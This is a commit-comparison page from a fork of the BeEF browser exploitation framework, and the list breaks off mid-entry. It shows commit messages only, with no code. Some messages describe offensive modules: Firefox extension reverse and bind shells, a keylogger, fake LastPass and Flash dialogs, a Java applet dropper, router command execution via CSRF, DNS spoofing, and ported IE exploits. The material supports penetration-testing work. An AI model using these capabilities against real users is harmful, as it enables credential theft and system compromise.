Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.4.3
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
...
compare: Hiddenden:beef-0.4.5.0
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

396 Commits
beef-0.4.4 ... beef-0.4.5

Author SHA1 Message Date
Brendan Coles
c1a7b1ec08 Use filter 2014-04-25 04:17:17 +10:00
Brendan Coles
9af8e6bd00 Add CPU type filter 2014-04-25 04:16:53 +10:00
Brendan Coles
a317b223ca Update description 2014-04-25 03:52:57 +10:00
bcoles
6fe8772710 Refactor browser component details 2014-04-25 02:11:58 +09:30
Wade Alcorn
94b636c6fd Fixed reference to origin 2014-04-24 19:36:58 +10:00
Wade Alcorn
8dfa674134 Merge branch 'master' of github.com:beefproject/beef 2014-04-24 19:36:10 +10:00
Wade Alcorn
52c2ef45e1 Fixed reference to origin 2014-04-24 14:44:26 +10:00
Christian Frichot
f17569cc35 Chrome Browser detection up to v36 for Desktop and iOS 2014-04-24 11:48:42 +08:00
Brendan Coles
82e09e88ff Merge pull request #999 from bcoles/nginx 
Add nginx imitation
 2014-04-23 00:16:23 +10:00
bcoles
2ee9fb6ccc Add nginx imitation 2014-04-22 22:49:21 +09:30
Brendan Coles
d0cdb9ec90 Update config.yaml 
Edit comments for consistency.
 2014-04-22 21:05:05 +10:00
Brendan Coles
ed5a11479a Merge pull request #998 from bcoles/geoip 
Add support for MaxMind GeoIP
 2014-04-22 02:31:54 +10:00
bcoles
4529dd1a6c Add support for MaxMind GeoIP 2014-04-22 00:58:49 +09:30
Brendan Coles
a131e670bc Merge pull request #995 from bcoles/update_print 
Update print methods
 2014-04-20 20:20:18 +10:00
Brendan Coles
17f265cb83 module.rb minor code cleanup 2014-04-20 20:12:33 +10:00
bcoles
354c3f1af0 Downgrade error to warning 2014-04-20 18:52:14 +09:30
bcoles
7689af8e2c Add print_warning, print_good and print_status 2014-04-20 17:24:25 +09:30
Brendan Coles
691ae19426 Update Gemfile 
Add comments

Add gems for MySQL/PostgreSQL (commented out)

Add Twitter gem dependency (commented out)
 2014-04-17 13:40:59 +10:00
antisnatchor
f2c83ced4d Merge remote-tracking branch 'origin/master' 2014-04-14 11:48:23 +02:00
antisnatchor
940b03e249 Removed twitter dependency from Gemfile as it's causing depenedencies issues sometimes, and the twitter notification feature isn't that used anyway. 2014-04-14 11:46:42 +02:00
Michele Orru
78a0c689be Merge pull request #992 from RootPrivileges/windows-pretty-theft 
Add a Windows prompt to the pretty_theft module
 2014-04-14 11:41:16 +02:00
RootPrivileges
5ddb88db73 Add a Windows prompt to the pretty_theft module 2014-04-14 10:23:30 +01:00
Brendan Coles
f526f39f10 Warn about Heartbleed if opemnssl is vulnerable 
Warn user if the OpenSSL library is vulnerable to Heartbleed and HTTPS is enabled.

Part of #990
 2014-04-13 03:33:32 +10:00
Brendan Coles
5d1d519fc2 unless proxy_clients.empty? 
replace `unless proxy_clients.nil?` with `unless proxy_clients.empty?`
 2014-04-13 02:31:52 +10:00
Brendan Coles
d9fd2b994e Add browser proxy details to browser summary 2014-04-13 02:29:09 +10:00
Brendan Coles
dde007ce86 Merge pull request #987 from ecneladis/master 
Adding module for getting battery status
 2014-03-25 21:25:57 +11:00
ecneladis
6044de5604 Adding module for getting battery status 2014-03-24 12:46:43 +01:00
Michele Orru
4e3f0366bf Merge pull request #986 from koto/master 
Added payloads for Chrome extensions injector
 2014-03-22 15:39:27 +01:00
antisnatchor
2cf4e7e055 Re-added csrf_to_beef tool (removed for mistake, sorry) 2014-03-22 15:31:55 +01:00
Krzysztof Kotowicz
3947bac044 added payloads 2014-03-22 11:28:27 +01:00
Brendan Coles
99c251610d Merge pull request #985 from veshi/master 
trivial: fix some misspelled words.
 2014-03-20 17:26:25 +11:00
Adrian Kalaveshi
e139ad121e trivial: fix some misspelled words. 2014-03-19 17:06:56 -07:00
Michele Orru
0664ce688e Merge pull request #984 from bcoles/getDefaultBrowser 
Add 'beef.os.getDefaultBrowser'
 2014-03-19 17:20:32 +00:00
bcoles
7d6eb4b714 Add 'beef.os.getDefaultBrowser' 2014-03-20 02:49:08 +10:30
bcoles
97898d453c Moved Detect Default Browser module to Host category 2014-03-20 00:58:16 +10:30
bcoles
fab0bf6b24 Add Detect HP module 2014-03-20 00:52:25 +10:30
bcoles
4a603b9f00 Add IE10 resource URL browser fingerprint 2014-03-19 23:49:21 +10:30
bcoles
73c42f34f6 Add support for Firefox 28 2014-03-19 11:02:25 +10:30
Michele Orru
ca13af9f4e Merge pull request #983 from koto/se-talk 
Added new files, readme and contact info to chrome extensions exploits
 2014-03-18 12:01:08 +00:00
Krzysztof Kotowicz
2105121c93 added new files, readme and contact info 2014-03-18 12:56:57 +01:00
antisnatchor
98ca29e51e Moved xsrf_to_beef in its own dir. 2014-03-16 15:48:39 +00:00
antisnatchor
4db376f11c Merge branch 'master' of https://github.com/beefproject/beef 2014-03-16 15:47:16 +00:00
antisnatchor
df4ec41538 Added Chrome Extension exploitation tools from me and Kkotowicz. 2014-03-16 15:45:16 +00:00
bcoles
ee1e29341e Move firefox extension modules to social engineering directory 2014-03-16 18:18:18 +10:30
Brendan Coles
7a8115211d Merge pull request #981 from beefproject/MSF-Target-Browsers 
Added support for target browser detection for MSF modules #530
 2014-03-16 13:39:03 +11:00
antisnatchor
05979af3a2 Treating IE9 and 10 as the same for the ui_abuse_ie attack 2014-03-14 13:22:16 +00:00
antisnatchor
4a733a6f74 Finishing ui_abuse_ie module development. Minor fix on one animated gif remains. Tested on IE9/10 on Win7 successfully. 2014-03-13 17:37:04 +00:00
antisnatchor
d4fd537108 Continued working on ui_abuse_ie module 2014-03-12 20:58:39 +00:00
antisnatchor
14f1991542 Fixed config.yaml issue in ui_abuse_ie module. 2014-03-12 17:15:22 +00:00
antisnatchor
1c055febeb Working on new exploit module that abuses UI expectations on IE9/10 tricking the user to run a (signed) exe. Based on Rosario Valotta research. 2014-03-12 16:59:09 +00:00
Brendan Coles
b3c4753114 Merge pull request #976 from kxynos/master 
Remove stuck iframes and get html from page and iframes modules

Thanks @kxynos
 2014-03-11 09:08:02 +11:00
Kosta Xynos
44058f0025 Remove stuck iframes and get html from page and iframes modules 2014-03-09 21:55:21 +00:00
antisnatchor
afdb7044d8 BeEF debug == false by default 2014-03-06 17:34:33 +00:00
Michele Orru
161729bba5 Merge pull request #975 from kxynos/master 
Added support for Asus RT-N66U and DSL-N66U Command Execution via CSRF
 2014-03-06 17:32:09 +00:00
antisnatchor
8f4f51874d Fixed issues with the DNS server RESTful API. Now it works. 2014-03-06 17:11:27 +00:00
Kosta Xynos
25550f9cfa Add Asus RT-N66U and DSL-N66U Command Execution via CSRF support 2014-03-06 16:20:44 +00:00
antisnatchor
46e165df5e Added support for browser language detection. Also added a new entry in Browser Details and JS call beef.browser.getBRowserLanguage() 2014-03-06 12:35:02 +00:00
bcoles
3494542b54 Make upstream DNS server configurable 2014-03-04 00:56:41 +10:30
bcoles
c11d4d40ea replace backticks with IO.open 2014-03-03 22:31:14 +10:30
antisnatchor
2f7ccf033c Commented out the tests for DNS code. 2014-03-02 16:14:56 +00:00
antisnatchor
91fa8f4e63 Various fixes for the DNS extension code. 2014-03-02 16:05:57 +00:00
antisnatchor
cdb050a940 Added more delay to beef_start Rakefile task. 2014-03-02 16:05:19 +00:00
antisnatchor
39e672f420 Fixed 2 RCE bugs in the DNS extension code (unsafe eval calls). 2014-03-02 15:43:36 +00:00
antisnatchor
ec9cf4d460 Manually merged DNS extension code (pull request 967 from @soh-cah-toa) 2014-03-02 12:56:33 +00:00
antisnatchor
9dcff5184d Manually merged DNS extension code (pull request 967 from @soh-cah-toa) 2014-03-02 12:40:18 +00:00
bcoles
32d30a8176 Remove the method from a couple of 'beef.dom.createIframe' calls 
Part of issue #969
 2014-02-28 23:49:27 +10:30
Brendan Coles
55af5625bb Merge pull request #972 from pgrohe/pgrohe/issue969 
Pgrohe/issue969
 2014-03-01 01:06:41 +11:00
Ben Passmore
52aacdde66 Removed bundle install from Rakefile for TeamCity 2014-02-26 15:45:06 +10:00
antisnatchor
7639537d11 Added support for Chrome 32 and 33. 2014-02-25 13:31:59 +00:00
Phil Grohe
d050198afa Clean up .gitignore file. Accidentally committed changes to it to exclude my Sublime Text 2 project files. 2014-02-23 12:04:52 -05:00
Phil Grohe
f274001a65 Revised comments on beef.dom.createIframe() to reflect removal of 'method' parameter & form submitting behavior. Updated existing function calls to beef.dom.createIframe() to remove 'method' parameter. 2014-02-22 11:57:56 -05:00
Phil Grohe
cc51e2c294 Initial revision of beef.dom.createIframe() Removed 'method' parameter and code path that creates a form and uses created iframe as target. 2014-02-22 11:18:12 -05:00
Wade Alcorn
7554449218 Version number updated 2014-02-22 06:42:16 +10:00
Saafan
a4973a5365 Merge pull request #946 from offensivecoder/update_twitter_require_version_5 
Update twitter require version 5
 2014-02-21 00:48:46 +02:00
bcoles
bcb8a1b858 Merge branch 'master' of https://github.com/beefproject/beef 2014-02-14 10:02:00 +10:30
bcoles
4cbe074259 Add support for IE11 2014-02-14 10:01:39 +10:30
Wade Alcorn
744b7649e7 Corrected some usages of domain to origin 2014-02-08 09:56:31 +10:00
soh_cah_toa
a75a95b663 Implemented DNS spoofer in social engineering extension. 
The /api/seng/clone_page endpoint now accepts a boolean "dns_spoof"
key in the JSON request. This adds a DNS record pointing the
cloned webpage to the BeEF server.

Integration tests included.
 2014-02-04 16:18:12 -05:00
bcoles
5084083e23 Update BeEF version to 0.4.4.10-alpha 2014-02-01 21:40:18 +10:30
bcoles
c52d3651e7 Fix indentation 2014-01-28 20:54:57 +10:30
bcoles
563296f67b Add malicious FF extension (reverse shell) module 2014-01-27 08:30:37 +10:30
bcoles
d230cfa593 trivial edits for consistency 2014-01-27 07:29:00 +10:30
bcoles
2b44c9184d Add malicious FF bindshell module 2014-01-27 07:21:44 +10:30
bmantra
b2d03e9364 Merge pull request #963 from bmantra/master 
Inital version of CookieJar overflow module.  And minor bugfix of active…  closes #935
 2014-01-19 11:02:13 -08:00
bmantra
0e57fb0be1 Inital version of CookieJar overflow module. And minor bugfix of active fax overflow module. 2014-01-19 19:58:14 +01:00
Michele Orru
275db51dd2 Merge pull request #962 from bcoles/csrf_to_beef 
Add CSRF to BeEF module tool
 2014-01-14 02:23:07 -08:00
bcoles
9e683d03bf Add Firefox 27 support 2014-01-13 23:22:29 +10:30
bcoles
71b539940b Add color, output functions and Ruby version check 2014-01-13 00:42:32 +10:30
bcoles
8ea8098fe2 Validate module class/dir name 2014-01-13 00:26:03 +10:30
Brendan Coles
ce5b576de1 Merge pull request #961 from bcoles/createIframeXsrfForm_enctype 
Add encoding type argument 'enctype' to 'createIframeXsrfForm()'
 2014-01-12 05:11:42 -08:00
bcoles
048405d4f1 Add dynamic module options 2014-01-12 19:09:11 +10:30
bcoles
83ed8558b7 Add encoding type argument 'enctype' to 'createIframeXsrfForm()' 2014-01-12 02:34:24 +10:30
bcoles
c0dee2fe54 Add form encoding type support 2014-01-12 00:28:14 +10:30
bcoles
e50d681a64 Add BozoCrack module 2014-01-11 23:27:13 +10:30
bcoles
1f83c2a63f Add Redis IPEC module 2014-01-08 22:22:22 +10:30
antisnatchor
9060e4c64f Issue #951: added notes about Windows installation. 2014-01-06 16:34:04 +00:00
antisnatchor
277d205663 Issue #951: added notes about Windows installation. 2014-01-06 16:29:11 +00:00
antisnatchor
4732d66586 Fixed issue #951: BeEF can now be installed correctly on Windows. 2014-01-06 16:13:32 +00:00
antisnatchor
927f8efaed Updated README file 2014-01-06 14:52:51 +00:00
antisnatchor
10c9988493 Updated README file 2014-01-06 14:49:19 +00:00
antisnatchor
a0a36d333a Added a note about using SSL when connecting to Metasploit. Related to issue #958 2014-01-06 14:14:19 +00:00
antisnatchor
6a8a103b8b Final fix for issue #957 2014-01-06 11:03:40 +00:00
bcoles
3d5ecd0787 Add tools/csrf_to_beef - initial commit 2014-01-05 12:13:49 +10:30
bcoles
88019d21a3 Add error message for nil command module key 2014-01-05 05:45:48 +10:30
bcoles
faafa9a196 Modify customhook extension to allow multiple hook points 2014-01-04 14:02:43 +10:30
bcoles
7c977ef1aa Move 'modules/exploits/sqlitemanager_xss/' to 'modules/exploits/xss/' directory 2014-01-04 11:48:10 +10:30
bcoles
f97087c37a Change hard-coded 'hook.js' to 'beef.http.hook_file' 2014-01-04 11:33:58 +10:30
bcoles
6d449672ae Trivial edits to 'secret_page.html' demo page 2014-01-04 09:06:14 +10:30
antisnatchor
b43fbce044 Fixed issue #957. The requester and proxy now work again after the jquery update. 2014-01-03 13:48:31 +00:00
antisnatchor
2899886543 Added more client-side debugging/logging features to better trace errors when a module fails. 2014-01-03 11:52:00 +00:00
Wade Alcorn
8003f1a47f Updated the copyright year to 2014 2014-01-01 16:34:15 +10:00
bcoles
b307891364 Add 'IE MS13-069 CCaret Use-After-Free' exploit module from MSF 2013-12-30 22:53:18 +10:30
bcoles
f0d989f6e9 Update description 2013-12-30 22:48:51 +10:30
bcoles
fe37a14adc Add 'IE MS12-004 midiOutPlayNextPolyEvent Heap Overflow' exploit module from MSF 2013-12-30 10:59:25 +10:30
bcoles
bece5c1438 Add wifi_pineapple_csrf module (untested and disabled) 2013-12-30 07:58:07 +10:30
bcoles
1862870b11 Get all input fields 
Update 'Get Form Values' module to retrieve all input fields
on the hooked page - not just input fields inside of form elements.

This makes more sense.
 2013-12-30 07:19:37 +10:30
bcoles
02e6d4db11 Rescue StandardError rather than Exception 2013-12-30 06:41:07 +10:30
bcoles
c9f0b73100 Add config path to error message 2013-12-30 05:27:27 +10:30
bcoles
d17d1357c6 Upgrade jquery from 1.5.2 to 1.10.2 2013-12-29 23:49:30 +10:30
bcoles
6efa01cc22 Upgrade jquery from 1.5.2 to 1.10.2 2013-12-29 23:39:06 +10:30
bcoles
91b06ca158 Add support for Firefox 26 2013-12-22 19:16:22 +10:30
antisnatchor
b28a79b56a Enhancing the keylogger to log also shift/alt/ctrl 2013-12-15 16:01:50 +00:00
bmantra
adde5275af Merge pull request #950 from bmantra/master 
2 seconds is more than enough to send a fax :p
 2013-11-29 12:27:59 -08:00
bmantra
94e98f2fbb 2 seconds is more than enough to send a fax :p 2013-11-29 21:25:35 +01:00
bmantra
8a90f37cd8 Merge pull request #949 from bmantra/master 
add module for Cross-Site Faxing (XSF)
 2013-11-29 12:10:11 -08:00
bmantra
7afa52ec99 add module for Cross-Site Faxing (XSF) 2013-11-29 21:06:36 +01:00
bmantra
513e61aff2 Merge pull request #948 from bmantra/master 
add new IPE with ActiveFax 5.01
 2013-11-29 10:22:26 -08:00
bmantra
d7116b8f08 add IPE with ActiveFax 5.01 2013-11-29 19:18:37 +01:00
Christian Frichot
924717d6fa Support for Chrome version 31 in browser detection 2013-11-25 16:38:55 +08:00
Marc Wickenden
f2ba3b55e8 require version 5 of the twitter gem due to removal of Twitter.configure method 2013-11-24 00:20:08 +00:00
Marc Wickenden
91575adcb2 Merge branch 'master' of https://github.com/beefproject/beef 2013-11-24 00:16:36 +00:00
bcoles
db02b982bc Merge branch 'master' of https://github.com/beefproject/beef 2013-11-05 16:00:55 +10:30
Brendan Coles
5df78c1284 Merge pull request #943 from gcattani/FakeLastPass 
Module Update: Fake LastPass
 2013-11-04 22:18:14 -08:00
bcoles
8875674f3b Update version to '0.4.4.9-alpha' 2013-11-05 15:47:39 +10:30
bcoles
ce2b5293af Add support for Firefox 25 2013-11-05 14:45:27 +10:30
gcatt
612d0d91bb Module Update: Fake LastPass 
Updated Firefox frame in order to look more similar to the real one.
 2013-11-04 15:41:31 +01:00
bcoles
05502a3c91 fix bug preventing loading of 'replace_video_fake_plugin' module 2013-11-04 15:52:54 +10:30
Michele Orru
441ccbbfce Merge pull request #941 from gcattani/LcamtufDownload 
Module Update: lcamtuf Download
 2013-10-30 10:31:57 -07:00
gcatt
f1df608f64 Module Update: lcamtuf Download 
Updated Adobe Flash Player URL to the current one.
 2013-10-30 18:29:44 +01:00
Michele Orru
24bf95ff16 Merge pull request #940 from gcattani/FakeFlashUpdate 
Module Update: Fake Flash Update
 2013-10-30 10:15:28 -07:00
gcatt
9987f0781f Module Update: Fake Flash Update 
Updated the prompted picture and part of the module.
 2013-10-30 17:05:01 +01:00
bcoles
41bfb8e995 Fix bug with Unity Web Player detection 
Fix issue #910
 2013-10-17 17:54:16 +10:30
Michele Orru
77950ae680 Merge pull request #938 from gcattani/hasUnity 
Module: Detect Unity Web Player
 2013-10-15 06:53:41 -07:00
gcatt
d4c69f2bfd Module: Detect Unity Web Player 2013-10-15 15:47:47 +02:00
bcoles
8e6751611d Add beef.browser.getPageHead() and beef.browser.getPageBody() 
Update 'Get Page HTML' module to use these functions

Tested on IE6, FF22, C28

Fix issue #518
 2013-10-13 03:37:15 +10:30
bcoles
09443675cc Fix bug in fake_notification_ff module 2013-10-12 00:43:54 +10:30
bcoles
70cac51a5d Add error check for missing dropper 2013-10-11 23:14:56 +10:30
antisnatchor
69ff8c0013 Added rubyzip dependency to core.rb. Fixed a bug in dom.js when attaching applets for IE. 2013-10-10 20:54:29 +01:00
antisnatchor
050da281ac Modified Gemfile. Added missing directory for Firefox Extension dropper module. 2013-10-10 20:47:14 +01:00
antisnatchor
5dd46ffd72 From antisnatchor with love. New module: malicious Firefox Extension dropper. Based on @mihi42 FF extension. 2013-10-10 15:18:03 +01:00
antisnatchor
45c51180a6 Completely removed deployJava ro prevent CtP issues on Firefox. 2013-10-09 16:11:27 +01:00
antisnatchor
b280d099f8 From antisnatchor with love. New module: Signed Java Applet dropper (win only for now). 2013-10-08 17:02:02 +01:00
antisnatchor
2c750670d7 fixed doctype error in basic.html (IE only) 2013-10-08 15:21:54 +01:00
antisnatchor
71a67defd4 Added new RESTful API method to bind a local file to a url. Also added "dropper" directory into Social Engineering extension. 2013-10-08 14:08:52 +01:00
bcoles
638e037e56 Remove Java and VLC detection from hook init 2013-10-06 19:17:55 +10:30
Christian Frichot
8033b77b73 Support for Chrome version 30 in browser detection 2013-10-06 17:20:01 +08:00
antisnatchor
2f51deb88a Fixed issue with Social Engineering extension when using an SMTP server without any needed authentication. 2013-10-02 14:53:04 +01:00
antisnatchor
8d44b48768 Added dependency to therubyracer (V8 implementation for Ruby) if the OS is not OSX. 2013-10-02 14:24:22 +01:00
antisnatchor
86d23d3815 Fix issue #662 the Web UI base path can now be configured in the main config.yaml. Web UI JS files are now also minified. 2013-10-01 17:16:46 +01:00
bmantra
a1f102b869 Merge pull request #933 from bmantra/master 
initial commit of the beef bind shellcode
 2013-09-28 12:18:21 -07:00
bmantra
fa95ac5b55 initial commit of the beef bind shellcode 2013-09-28 21:18:23 +02:00
Michele Orru
5980eff047 Merge pull request #931 from DinisCruz/patch-1 
adding info to read me about running beef in windows
 2013-09-27 02:10:45 -07:00
Dinis Cruz
31587f689b adding into to read me about running beef in windows 2013-09-27 00:59:36 +01:00
bcoles
5942138aba Update spyder eye module 
* file error handling
* render the screenshot in the admin UI
* log screenshot filename to master logs
 2013-09-12 18:29:56 +09:30
bcoles
189e6543e0 Fix bug with rendering images from command responses in the admin UI 2013-09-12 18:26:00 +09:30
bcoles
25aca3d291 Update 'command.js' for Spyder Eye module 2013-09-11 15:26:15 +09:30
bcoles
257a310a02 Update 'module.rb' for Spyder Eye module 2013-09-11 15:24:54 +09:30
bcoles
2420d59a72 Update 'config.yaml' for Spyder Eye module 2013-09-11 15:20:19 +09:30
Brendan Coles
66f01ff4e6 Merge pull request #930 from preth00nker/master 
adding generic module to take screenshoots with canvas
 2013-09-10 23:33:37 -07:00
Christian
3f7eec4e28 adding generic module to take screenshoots with canvas 2013-09-09 13:52:13 -05:00
Christian Frichot
1b6159ebeb New Module - Detect Internal IP with WebRTC. See Issue #929 2013-09-08 11:09:57 +08:00
Christian Frichot
df4b0bce5e Supports Chrome 29 detection 2013-09-07 12:56:21 +08:00
Saafan
d872a5a3e7 Merge remote-tracking branch 'origin/master' into Detect-Java 
Conflicts:
	core/main/client/browser.js
 2013-08-20 05:55:27 -04:00
bcoles
f5b86e7894 Add metasploit default path for kali 2013-08-19 12:37:35 +09:30
bcoles
db83cdd086 Add metasploit default path for pentoo - take 2 2013-08-19 12:37:06 +09:30
bcoles
e9e085e9e1 Add metasploit default path for pentoo 2013-08-17 21:56:42 +09:30
Brendan Coles
62a5d5e96c Merge pull request #927 from thefinn93/spellingfix 
Correct minor typo in the default config.yml
 2013-08-11 02:22:52 -07:00
Finn Herzfeld
173178e1d6 Updated text as requested by bcoles 2013-08-11 00:07:59 -07:00
bcoles
f2883e0c94 Fixed typo 
Extra 'i' from vim insert mode
 2013-08-09 13:34:24 +09:30
bcoles
858814c614 Update BeEF core to complete HTTPS support 
Part of issue #745
 2013-08-09 13:28:35 +09:30
bcoles
21417dc3e2 Update BeEF server protocol for multiple modules to use 
`beef.http.https.enable`

Now uses the `beef.net.httpproto` value rather than a hard-coded
protocol string.

Part of issue #745
 2013-08-09 13:21:33 +09:30
Finn Herzfeld
ca8f5d37e1 Corrected minor typo 2013-08-06 17:03:17 -07:00
bcoles
c6314f97cb Update version to beef-0.4.4.7-alpha 2013-08-04 16:45:24 +09:30
Brendan Coles
1a5b21765f Merge pull request #924 from phihag/install-pipeline-instead-of-fifo 
Use a pipe instead of a fifo during installation
 2013-08-04 00:54:26 -07:00
Brendan Coles
9fe27b113f Merge pull request #923 from phihag/install-abort-on-error 
Update install to abort on error
 2013-08-04 00:52:56 -07:00
Saafan
402f4997df Fixing java support by separating Oracle deployement toolkit in a separate file. #786 2013-08-03 16:25:46 -04:00
Philipp Hagemeister
3948750571 Use a pipe instead of a fifo during installation 
bash's anonymous fifos are only available if devfs is mounted.
On a system without /dev mounted (which is perfectly reasonable for a locked-down security testing machine), installing beef fails with (after applying #923)

    install-beef: line 81: /dev/fd/62: No such file or directory

This commit fixes and lets the installation run through.
 2013-08-01 17:33:09 +02:00
Philipp Hagemeister
957510b6d9 Abort on error 
On a (debian) system without sudo, lots of messages rush by, and it's not obvious was fails.
With this change, the log looks like:

    $ bash install-beef
    bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
    ======================================
               BeEF Installer
    ======================================

    CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environemnt and it's dependencies.

    In rare cases, this may lead to unexpected behaviour or package conflicts on some systems.

    Are you sure you wish to continue (Y/n)?

    Detecting OS..
    Debian/Ubuntu Detected
    Installing Prerequisite Packages..
    install-beef: line 74: sudo: command not found

which is far more informative.
 2013-08-01 17:30:00 +02:00
soh_cah_toa
9d4ea6c224 Fixed issue mentioned in FIXME comment in RubyDNS::Server#match. 
Changed 'block.class.name' to just 'block' in case/when clause.
 2013-07-22 22:42:27 -04:00
soh_cah_toa
b2aed14234 Added regex support to #add_rule (tests included). 
Due to strange behavior in Sourcify, the /.../ literal syntax cannot
be used as a parameter; only %r{} or Regexp::new. There is a note
for this in the documentation for #add_rule.
 2013-07-22 22:37:39 -04:00
Saafan
75f33016ea Added support for target browser detection for MSF modules #530 2013-07-22 08:49:56 -04:00
Christian Frichot
7f64c94e03 New Module - Fake LastPass Dialog 2013-07-21 13:53:44 +08:00
Christian Frichot
82a70fbcd0 Detect LastPass module (except on IE) - #802 2013-07-20 13:58:20 +08:00
soh_cah_toa
6a62cf9eaa Added public attributes 'address' and 'port' to Dns::Server. 
This removes the need to search config.yaml for the address:port.
Also included unit tests.
 2013-07-19 22:33:40 -04:00
soh_cah_toa
8d961c1938 Added support for rules that fail to resolve (e.g. NXDOMAIN). 
Included unit tests.
 2013-07-19 22:15:25 -04:00
soh_cah_toa
141a12a92f Included #remove_ruleset in public interface tests. 2013-07-17 18:19:56 -04:00
soh_cah_toa
95d0ddbe87 Added new method #remove_ruleset that clears the entire DNS ruleset. 
Included unit tests as well.
 2013-07-17 18:16:46 -04:00
soh_cah_toa
9cfb98963d Added unit tests for #get_ruleset. 2013-07-16 23:48:46 -04:00
soh_cah_toa
94da775ba6 Added unit tests for #remove_rule (good and bad behavior). 2013-07-15 23:58:37 -04:00
soh_cah_toa
85d4375825 Added unit tests for #get_rule with an invalid id. 
Also overrode Kernel#puts to suppress output from RubyDNS.
 2013-07-15 23:36:29 -04:00
soh_cah_toa
4d0f58684f Divided #add_rule tests into separate good and bad tests. 
Also added unit tests that verify rule id format.
 2013-07-15 23:07:06 -04:00
soh_cah_toa
8d95e6f522 Changed public interface tests to use #assert_respond_to. 
This will improve the accuracy of potential error messages.
 2013-07-15 18:25:33 -04:00
soh_cah_toa
5769615cd5 Added unit tests for #get_rule. 
Also removed convenience variables from #add_rule tests (domain and
response). The "response" key in the hash returned by #get_rule is
generated by Sourcify which sourcifies the variable name, not its
value.
 2013-07-15 03:48:01 -04:00
soh_cah_toa
9a4fd6cb4c Removed "dns" task in Rakefile since "unit" is fine now. 2013-07-15 03:02:29 -04:00
soh_cah_toa
1ffa21d62a Added unit tests for #add_rule. 
These represent the first actual tests for the Dns::Server class.
 2013-07-15 02:47:37 -04:00
soh_cah_toa
d8a8e37029 Moved DM adapter setup into first "test" method. 
Since #setup is called between each test, the database table would
otherwise be cleared every time.
 2013-07-15 02:39:41 -04:00
soh_cah_toa
8270abd2d5 Added unit tests for Dns::Server public interface. 2013-07-15 02:12:31 -04:00
soh_cah_toa
3865aab7ee Added unit tests for required config.yaml settings. 2013-07-15 02:07:26 -04:00
soh_cah_toa
123c3cdc04 FIXED UNIT TEST ISSUES!!! \(^o^)/ 
Load path and configuration setup belong in #startup along with any
required files. DataMapper adapter connections go in #setup. That's
the secret recipe.
 2013-07-15 02:00:12 -04:00
soh_cah_toa
ebbadba6dd Improved #run_server to check if EM reactor is already running. 
Also moved Thread creation to inside #run_server instead of
forcing caller to do so.
 2013-07-14 23:27:21 -04:00
Christian Frichot
a22926bc53 Merge remote-tracking branch 'origin/master' 2013-07-08 19:41:10 +08:00
bcoles
2c2b9a85f4 Update browser fingerprinting module firefox signatures 2013-07-08 10:57:02 +09:30
bcoles
dd811ca234 Add proxy detection using http headers to browser details 
Add proxy details to browser log

Part of issue #527

Note: does not work for transparent proxies
 2013-07-08 00:25:49 +09:30
Christian Frichot
acfdf45d16 Merge remote-tracking branch 'origin/master' 2013-07-06 15:10:43 +08:00
bcoles
e88c3c1f86 Add fake_notification_c module 
Part of issue #695
 2013-07-05 01:17:20 +09:30
bcoles
